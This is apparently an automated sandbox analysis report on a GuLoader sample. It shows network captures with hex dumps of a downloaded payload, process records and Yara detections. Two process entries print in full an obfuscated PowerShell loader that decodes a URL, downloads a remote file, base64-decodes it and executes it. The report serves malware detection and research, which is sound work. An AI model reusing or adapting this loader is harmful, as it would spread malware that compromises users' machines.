                                                                          Host: fs03n3.sendspace.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: SID=ns2pmla9s88ipijkujilaccdr6
                                                                          2024-05-23 19:01:03 UTC437INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Thu, 23 May 2024 19:01:02 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 64576
                                                                          Last-Modified: Mon, 20 May 2024 13:14:30 GMT
                                                                          Connection: close
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Content-Disposition: attachment;filename="jXoEkwyvRCuipiJXijfHFGP97.bin"
                                                                          ETag: "664b4cb6-fc40"
                                                                          Accept-Ranges: bytes
                                                                          2024-05-23 19:01:03 UTC15947INData Raw: eb 58 6f 1b 8d 94 f0 5c b7 18 e5 43 65 a4 d6 30 ea ae ca 7e 94 5e 0d 8c 6c 0c b1 41 0f c2 d8 c5 fb a0 7d 17 f7 e7 17 db 70 8d ad d2 6d 1e 61 c6 80 b3 d2 34 26 51 9a 9f 32 a6 b5 ad 43 b8 48 2a 8e 01 a9 17 6c a2 72 f5 5d 46 e9 c1 fd 64 80 35 96 6b 35 ca f6 33 7a 36 5a 65 18 27 5a 1c 83 fa fc d2 3e 8a 37 81 98 dd ae a6 ec ef 42 2d f8 3f 8c 9c 7d 7c 5a 4b e7 fc fe bf 9b 43 e4 4b 1b 10 ac a3 99 3b 76 c5 66 87 a9 42 90 ba 14 e6 99 39 a5 2d f6 56 d1 2e 81 92 f4 7c 5b d9 80 65 c4 89 dd ea a1 a5 fa d7 92 8c bc 4f 63 0c 12 6b ef 58 02 cc e1 0e 45 06 3d d3 4b e7 59 f3 80 0b 18 d2 dd 75 86 69 e5 fb 2e 61 d9 cf 51 f9 97 36 93 72 12 bd f3 0a 1e b2 ce 0a 43 96 98 24 a2 96 7f c4 f5 f7 88 eb ee 3a c8 85 3d 33 43 16 78 f4 28 d4 da 29 fa b2 84 3b b5 11 67 71 51 39 dc 14 1a
                                                                          Data Ascii: Xo\Ce0~^lA}pma4&Q2CH*lr]Fd5k53z6Ze'Z>7B-?}|ZKCK;vfB9-V.|[eOckXE=KYui.aQ6rC$:=3Cx();gqQ9
                                                                          2024-05-23 19:01:03 UTC16384INData Raw: 1c 28 f4 05 b6 35 bd ae 34 0b e2 00 b0 03 7f cf fd 78 14 f6 ad a2 f2 1e 77 2e a7 a0 2c 0f 79 3c da 28 4b 9e 38 35 ef e9 89 22 ae 8f 9a ca 64 ef 6c 0a 2e f2 63 26 18 a9 09 50 74 78 8f 6b 54 98 56 a4 3a 7f 5e 5b 39 11 45 a4 52 3a 59 46 e9 81 24 9b 80 35 30 e6 66 ca f6 32 71 35 1d 73 06 48 10 1c 83 f0 da d5 16 0b 37 81 9e d6 ac a1 fa c7 7c 2c f8 35 a4 02 7d 7c 5c 61 e1 dc 22 bf 9b 43 24 02 1b 10 a2 a4 ae 66 76 71 6e 41 8b fd 87 ee b6 8d cd 51 c6 78 d1 0e 22 41 e6 e6 9e 16 6d 92 de 0a aa ec a5 c8 eb 54 da a5 e1 e0 85 5b ac 2d 56 20 aa 75 57 b3 85 6b 6b 09 18 4c 6f e7 5f f0 ef ba 18 d2 8b 39 91 31 a4 f3 25 53 e7 d2 1f bb 4a 36 93 72 52 f4 f3 0a fe a8 41 59 48 97 91 2f a1 7b 69 de 9a ad 88 eb e4 1c cf ad 72 3a 42 10 73 d3 3e fc e5 08 fb b8 88 39 dd 85 67 51 57
                                                                          Data Ascii: (54xw.,y<(K85"dl.c&PtxkTV:^[9ER:YF$50f2q5sH7|,5}|\a"C$fvqnAQx"AmT[-V uWkkLo_91%SJ6rRAYH/{ir:Bs>9gQW
                                                                          2024-05-23 19:01:03 UTC16384INData Raw: 92 de 88 6b ed 54 b7 c7 52 7d 17 90 33 db 6e 86 b1 cb 4a ac 6f 6e a1 f5 d2 1e 2a 6e 5d f6 0d 5b 36 bb 7d 43 8c d5 bf eb f1 13 52 dd 56 df 43 4a 4d 23 cd 1e 8c 73 0d d5 1d 49 78 53 40 55 03 6a 6d 72 b3 ad d0 85 7d 0f 63 9f 97 ef 8c ad 20 41 3c 0b 86 47 7f e2 7a 42 76 48 bf 3e 36 e2 6a cd 49 17 b1 59 99 29 70 d2 5c bc d3 39 29 05 f1 da ee b1 8c 03 94 c3 bb 1e 5b 9c bc c4 1e 13 42 ec f6 5f 45 8b 76 d7 3c ba 0e f2 e7 57 b8 14 fb ac 7a ac 60 59 55 16 91 72 69 91 aa 61 bc f2 af 3e ba 3d df 40 af 9f 7e 21 13 1c e2 92 63 c8 96 62 8d bc fd 69 ce c9 f9 db 58 7e 12 0d f8 2b 78 66 d1 17 2c a4 0f 49 3f 6e 4e b1 5e 7c 1c ff 57 48 f6 ed a9 33 08 0a 73 c9 cd 58 42 77 f6 83 e8 83 81 e2 aa 63 ad 53 51 8d 76 84 88 a9 26 28 f1 65 36 58 a3 7d 15 ee b3 60 0b 2d 16 5a 90 14 a9
                                                                          Data Ascii: kTR}3nJon*n][6}CRVCJM#sIxS@Ujmr}c A<GzBvH>6jIY)p\9)[B_Ev<Wz`YUria>=@~!cbiX~+xf,I?nN^|WH3sXBwcSQv&(e6X}`-Z
                                                                          2024-05-23 19:01:03 UTC15861INData Raw: 39 dd 01 d6 3d db c3 5d 40 54 41 fa 8d 5e c9 d0 c4 7a 40 cc 89 27 9a 84 eb f4 4b 7d f6 9a 9f 17 9a 36 fa b3 c1 05 23 94 30 6b 8f a3 90 ac 15 2f a3 de 56 9b 3a 6d c1 ed e6 f5 ad 54 7a 5b 9e df 4e 78 4d dc 2c 2b 21 d1 8f 5f ff 9c 2c 70 36 1e dc 58 c8 8a fd cb 68 57 f5 4a c2 31 c2 63 85 5a 8d 27 bc 05 3d 06 0c cf 73 ac b4 1f 62 92 92 85 98 02 77 52 d9 f4 02 45 66 67 e2 c3 27 63 37 df f6 48 b1 10 8d 56 6e df 0e d0 58 59 b4 d5 8b 99 95 b2 36 20 33 3a df 90 64 e2 4b 1c 61 2f 24 20 d8 a5 63 bd 7d e7 fd ae b2 da b5 93 5f 7b 0e cc 25 ab 9b 36 7c 52 f4 57 89 b3 41 4b ad 98 92 bc 2f 38 cc 10 ca 2d dc e9 80 c6 27 93 6f ad 1c e5 f4 a1 14 5e 01 3b 3e 83 0f d6 4f 82 39 d8 0a cc 85 a0 eb c5 bb 64 7a 78 e7 8a e4 fc 31 d0 30 ef 6e 2b ef 0a 84 f1 49 76 35 9b 79 9a 6c aa 14
                                                                          Data Ascii: 9=]@TA^z@'K}6#0k/V:mTz[NxM,+!_,p6XhWJ1cZ'=sbwREfg'c7HVnXY6 3:dKa/$ c}_{%6|RWAK/8-'o^;>O9dzx10n+Iv5yl


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:15:00:16
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" "
                                                                          Imagebase:0x7ff668460000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:15:00:17
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:15:00:17
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$ UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223 (Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 $Squarsonry;Inddatafiler223 (Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens 'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil, ') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223 (Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223 (Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth ');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. B.stGInopieAtelytApocoSA mlnt krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223 (Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;"
                                                                          Imagebase:0x7ff7be880000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2595939938.0000027AE9843000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:4
                                                                          Start time:15:00:17
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:5
                                                                          Start time:15:00:24
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
                                                                          Imagebase:0x7ff668460000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:6
                                                                          Start time:15:00:34
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$ UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223 (Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 $Squarsonry;Inddatafiler223 (Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens 'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil, ') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223 (Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223 (Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth ');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. B.stGInopieAtelytApocoSA mlnt krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223 (Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;"
                                                                          Imagebase:0x4e0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2447508436.00000000086D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2441971801.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2447876168.000000000923E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:7
                                                                          Start time:15:00:34
                                                                          Start date:23/05/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
                                                                          Imagebase:0x790000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:9
                                                                          Start time:15:00:54
                                                                          Start date:23/05/2024
                                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                          Imagebase:0x20000
                                                                          File size:516'608 bytes
                                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
